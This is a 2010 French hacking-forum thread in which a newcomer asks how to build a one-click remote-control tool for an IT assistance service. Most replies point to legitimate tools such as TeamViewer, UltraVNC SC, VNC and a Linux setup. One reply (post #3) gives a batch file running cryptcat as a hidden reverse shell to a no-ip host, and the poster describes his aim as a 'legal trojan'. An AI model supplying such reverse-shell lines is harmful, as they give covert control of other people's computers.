Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-05-2010 12:00:00

Informatense
Nouveau membre

CONTROLE A DISTANCE

Bonjour à tous!

Je suis nouveau ici et pas spécialement habitué a faire des posts dans les forums.
Ceci étant il me semble que c'est une étape indispensable quand à la réussite de mon projet et puis ça a l'air actif dans ce forum!

Bon rentrons dans le vif du sujet maintenant.

J'ai pour projet de mon monter une boite d'assistance informatique à distance. Le principe serait que des clients payent à l'année pour une assistance par contrôle a distance de leur pc des qu'il en ont besoin. Le client me contact je lui envoie via msn ou autre un fichier qu'il execute et qui s'installe seul sans intervention de sa part le tout sécurisé (bien évidemment il ne faut pas que les passerelles réseaux crééent ne puissent etre accessible a des personnes malveillante).

Pour pouvoir réaliser ceci il faut que je crée un fichier d'une extreme simplicité.
Il faudrait créé un .exe de la partie serveur d'un tunnel vpn qu'il s'installe seul sans configuration de la part du client. Avec en outre la possibilité de travaillé sur son pc en direct (il voit ce que je fais) ou indirectement (il ne voit pas ce que je fais sur son écran).

Petite précision les trojans ne m'interesse pas même si ça reste un peu le même principe.

Pour faire tous ça j'ai pensé qu'il faudrait désassembler le fichier.exe de vpn et de la recodé mais honnetement tout ce qui est programmation je suis un néophite donc c'est pour cela que j'en appel a vous.

Donc voila toute les propositions sont les bienvenues, les liens vers des video des tutos, des morceaux de code je prends tout.
Si vous souhaitez que l'on s'associe dans la conception du fichier il n'y a pas de probleme

en ésperant avoir été assez clair
bye
Ps: jai pas trouvé la section présentation lol donc désolé si je l'ai pas fait pourtant jai cherché

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-05-2010 12:20:25

goliate
Membre Irremplaçable
Site Web

Re : CONTROLE A DISTANCE

Pour ce que tu veux faire je pense que logmein repondra a tes attentes.

Ps = la section présentation et vers le bas ><

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#3 28-05-2010 12:24:31

Veidam
Membre Indispensable
Lieu : us

Salut je te répond un peu a la va vite je dois partir

voici ce que je ferais j'enverrais cryptcat en disant au client de le mettre dans systeme32

ensuite je lui joindrais un petit fichier bat style

@ echo
ping google.com
IF ERRORLEVEL==1 goto Erreurdeping
echo ** le ping a reussi **

call C:\WINDOWS\system32\cryptcat -d mydomaine.no-ip.biz 4444 -e cmd.exe

echo.

voila une fois une fenetre dos tu fais ce que tu veut pour ne plus avoir besoin de lui mais bon c 'est un exemple
il est facile de faire mieux

oui logmein permet de rassurer un client car il voit ton ip et sait si tu est sur son pc ou pas ....

Dernière modification par Veidam (28-05-2010 12:28:21)

#4 28-05-2010 13:03:17

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Site Web

salut
comme tu es ouvert a toute les idée je te donne la mienne wink ,ce n'est pas la meilleur non plus ^^
tu peux utiliser msn ( assisstance a distance )pour accéder a un bureau et prendre le controle a distance de son ordinateur (souris ,clavier etc..)
après tu utilise  un vpn pour securisér tou ca wink

@ ++

Dernière modification par raylook (28-05-2010 13:06:15)

fete.gif

#5 28-05-2010 13:15:51

goliate
Membre Irremplaçable
Site Web

quand tu dit msn tu veut dire amsn ou tu peut le faire aussi par msn?

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

#6 28-05-2010 13:32:03

raylook
Membre d'Or
Lieu : dans ton disque dur !!
Site Web

goliate a écrit :

quand tu dit msn tu veut dire amsn ou tu peut le faire aussi par msn?

amsn j'ai jamais utilisé  , non je parle bien windows live messenger  ,qui peut accéder au bureau et controler a distance l'ordinateur du contact ,j'ai testé ca fonctionne bien smile

Dernière modification par raylook (28-05-2010 13:32:26)

fete.gif

#7 28-05-2010 13:39:07

antares145
Membre d'honneur
Site Web

Salut Informatense, et bienvenue sur le forum smile

Ton concept est intéressant, en tout cas en tant que challenge (à notre niveau), donc voyons ce qu'on peut proposer...
Quelques remarques pour commencer, que je vais détailler par la suite
- le VPN, à mon avis, va être une complication dans ton cas
- VNC devrait correspondre à ce que tu cherches, en tout cas en partie
- ton plus grand ennemi/problème sera le NAT

D'abord le VPN.
L'idée est très séduisante, dns le sens où elle propose un excellent niveau de sécurité, et permet de mettre la machine-cible "en réseau local" avec la tienne, ce qui règle pas mal de problème de routage. D'ailleurs, dans cette configuration je pense que tu devrais faire tourner le serveur chez toi et donner un client au... ben au client justement, ca sera beaucoup plus simple à déployer wink
Par contre, le problème c'est que l'installation d'un client requiert au minimum un reboot, et les droits administrateur sur la machine, parce que le VPN impose de rajouter un adaptateur réseau (une "carte réseau virtuelle, si tu veux). Tout ceci est contraignant, en particulier le problème de droits, parce que tu ne peux pas toujours garantir que tous tes clients auront un compte admin sur leur machine. A toi de voir si le "risque" est négligeable ou pas. De plus, la connexion au VPN demandera un peu de "travail" à la personne en face, que tu peux aider par téléphone mais ca ne répond peut-être pas à tes exigences de simplicité wink

Ensuite, le protocole : VNC.
Je suppose que tu connais déjà, mais au cas-où en gros c'est la référence en matière de contrôle à distance (renseigne-toi un peu sur le protocole, tu verras qu'il correspond assez bien à ce que tu cherches). je pense tout particulièrement à [email protected], qui est (parait-il) le meilleur VNC sur Windows, avec la possibilité (entre autre) d'éteindre le moniteur de la machine, ce qui te permet de travailler "en discrétion" (sauf s'il suffit que le client rallume l'écran, à vérifier) smile
Le problème qui se pose ici, c'est qu'il faut que le client installe lui-même le serveur VNC, et qu'il ne se plante pas dans les options. Au pire tu peux leur faire un petit manuel avec illustrations, mais à nouveau : jusqu'où vont tes exigences de simplicité ?
Autre problème, VNC n'est pas prévu pour être "blindé" au niveau sécurité, donc l'idéal c'est de le faire passer par un tunnel VPN, mais alors on en revient aux problèmes mentionnés plus haut...

Saleté de NAT
Admettons que ton client aie un serveur VNC "up and running", auquel tu veux te connecter. Là, c'est le drame, il y a 99,999% de chances que ledit client soit derrière un routeur/passerelle, et qu'il y aie un transfert de ports dans le chemin. Ca veut dire que tu ne pourras pas te connecter directement à la machine, parce que le routeur n'est pas configuré pour laisser passer la connexion vers la bonne machine en question. Il y a 2 moyens de régler le problème :
- demander au client d'ouvrir un port de son routeur (auquel il n'a peut-être/sans doute pas accès...)
- faire en sorte que le client crée une connexion sortante vers chez toi, que tu réutilises pour entrer chez lui (ca s'appelle une connexion en reverse, très utilisée par les pentesters, qui ont le même problème pour rentrer sur des machines NATtées)
Veidam t'a proposé cette seconde solution, via cryptcat (création d'un tunnel sécurisé). La question que je me pose, c'est de savoir si cryptcat ne pourrait pas "rediriger" directement vers le serveur VNC plutôt que d'ouvrir une console. Je pense que si, mais il faut que je cherche comment wink

Des solutions pratiques
Après ces quelques considérations techniques, on peut se demander s'il n'existe pas une solution toute-faite qui te conviendrait en l'état. Goliate et raylook en ont proposé 2, je pourrais rajouter TeamViewer, qui a bonne réputation aussi.

Mais tant qu'on parle de VNC (et d'[email protected]), j'ai été voir ce qu'ils proposaient, et ils ont un add-on qui te permet de compiler ton propre serveur VNC qui s'installe tout seul, avec ton adresse IP pré-encodée, le client n'a qu'à double-cliquer pour que ca remonte chez toi; Il y a également moyen d'utiliser des modules Nat2Nat pour passer à travers les routeurs successifs, bref le tout mis ensemble pourrait bien te convenir smile Je te laisse juger via la page de leur site --> UltraVNC Single Click

UltraVNC SC is a mini (166k) UltraVNC Server that can be customized and preconfigured for download by a Customer. UltraVNC SC does not require installation and does not make use of the registry. The customer only have to download the little executable and Click to make a connection. The connection is initiated by the server, to allow easy access thru customers firewall.

Le tout est disponible de façon gratuite (p-ê pas en usage professionnel, à vérifier), mais la moindre des choses à faire si tu l'utilises c'est de leur faire une petite donation, histoire de respecter leur travail wink

Voilà déjà quelques bonnes pistes de travail, à toi de voir quel côté tu veux qu'on cruse d'avantage smile

PS : je déplace ton sujet dans une section plus généraliste, ici ca n'a pas grand chose à voir avec un botnet, ou alors tu as des intentions non avouées big_smile

#8 28-05-2010 13:42:38

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Sinon en cherchant un peu il y a des solutions pas mal avec VNC tu as une version simplifiée facile à configurer tu peux aller jeter un oeil sur Framasoft.

Sinon si tu bosses sur un parc qui se composera de machines sous Gnu/Linux et Windows linux tu peux utiliser des tunnels ssh et utiliser putty pour gérer tous ça sous Windows.

Edit : "Antarès m'a griller) smile

Je ne me lancerais donc pas dans de grandes explications hi hi.

Dernière modification par noireaude (28-05-2010 13:45:01)

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#9 28-05-2010 17:14:17

Jedix
Membre Actif

Un solution supplémentaire si t'as pas envie de te prendre la tête : http://www.spark-angels.com/web2/index.php

#10 28-05-2010 18:10:17

Informatense
Nouveau membre

Merci pour toutes vos réponse qui sont tres interessantes mais qui néanmoins nécéssite au client de faire un certain nombres de manipulations plus ou moins complexe.

Pour tout vous dire le point de départ de mon projet vient du fait qu'il n'existe pas d'ordi pour les personnes agées avec des interfaces simple et intuitive alors a défaut je veux réaliser ce projet de controle à distance le plus simple possible pour que le client apres avoir souscrit son abonnement annuel n'ai qu'a cliqué sur le fichier que je lui envoie pour que sa machine soit opérationnel et que je puisse m'y connecté.

En fait pour imager la chose cela ressemblerait a un cheval de troie légal en gros! la personne clic sur le fichier infecté et hop le tour est joué bah la c'est la meme mais en toute légalité sans que l'antivirus fasse un bon au plafond! sans avoir au usée de toute les technique pour franchir nat routeur et pare feu. Maintenant pour ce qui est d'etre visible ou non sur l'ordi du client c'est par rapport a l'attente du client si il souhaite qu'on lui montre une manipulation ou qu'on lui résolve un probleme ( dans le premier cas il faudrait qu'il voit ce que je fais et dans le 2eme cas il faudrait que je puisse bosser sur son ordi sans le gener dans ce qu'il fait).

Pour ce qui est des droits d'utilisations c'est justement pour ça que je veux élaborer mon systeme le plus possible par moi même de façon a éviter tout conflit par la suite.

Pour ce qui est de vos solutions celle de cryptcat qui redirige vers le serveur VNC me parait être une bonne idée mais reste a savoir comment je suppose qu'il faudrait modifier cryptcat en lui meme.

Ps: je vais étudier la solution ultraVNC elle me parait pas mal aussi

#11 29-05-2010 09:55:49

Dack
Membre Irremplaçable

Sinon il y a aussi Teamviewer qui est excellent !

#12 29-05-2010 10:55:15

faptiem
Membre Indéboulonnable

J'appuie Dack, c'est ce qui semble le plus adapté dans ton cas.
Je l'ai déjà utilisé avec des personnes peu à l'aise informatiquement parlant et il leur suffit de communiquer l'id/pw temporaire pour être aidés wink

#13 29-05-2010 11:10:58

Dack
Membre Irremplaçable

Ouai voila ! J'utilise ca pour aider mes oncles, tantes etc... qui n'y connaissent rien en informatique

#14 29-05-2010 11:12:57

antares145
Membre d'honneur
Site Web

Informatense a écrit :

Pour ce qui est des droits d'utilisations c'est justement pour ça que je veux élaborer mon systeme le plus possible par moi même de façon a éviter tout conflit par la suite.

Si tu veux vraiment aller au bout de ton idée, alors pars d'une distribution Linux que tu modifies/adaptes pour obtenir l'interface que tu veux (j'ai obtenu de très bons résultats avec OpenSuse + KDE4, pour un projet similaire). ca a plusieurs avantages :
- pas besoin d'antivirus/antispyware/anticrasses
- interface très personnalisable, + que ce que tu peux obtenir avec Windows
- tu peux préinstaller un serveur VNC/un forward X11-SSH qui tourne en permanence, ainsi qu'un client VPN préconfiguré activable en un seul clic : quand la personne clique sur l'icône, elle se connecte en VPN chez toi, tu te retrouves en "réseau local" avec sa machine, donc le routeur/NAT/firewall ne bloque plus les ports, tu peux lancer le contrôle à distance smile

Evidemment, ca implique que toi-même tu gères suffisamment Linux pour pouvoir faire du support big_smile

Sinon, comme tu dis [email protected] peut te convenir, et je rejoins les autres pour dire que Teamviewer est pas mal (et sans doute logmein aussi, mais je ne 'lai jamais essayé) wink

#15 29-05-2010 13:02:41

Squaks
Membre Irremplaçable

Super projet wink

Sharkoff

#16 29-05-2010 21:39:59

Informatense
Nouveau membre

Bah écoute antares merci de ta réponse. Pour tout te dire j'aime les difficultés et les défi et surtout j'ai soif de connaissance alors va pour linux meme si linux et moi ça fais 12*7/3 mais bon comme on dit ya un début a tout et puis avec un peu de recherche et un peu d'aide ici et la je devrais bien m'en sortir. Pour commencé je vais m'attaqué a l'interface appriori c'est la premiere chose a faire! si vous avez des tuto ou des cours ou des liens interessant je suis prenneur!
merci d'avance

#17 29-05-2010 21:42:22

Informatense
Nouveau membre

lol je vais déjà commencer par télécharger Opensuse (4.7 giga).

Annonce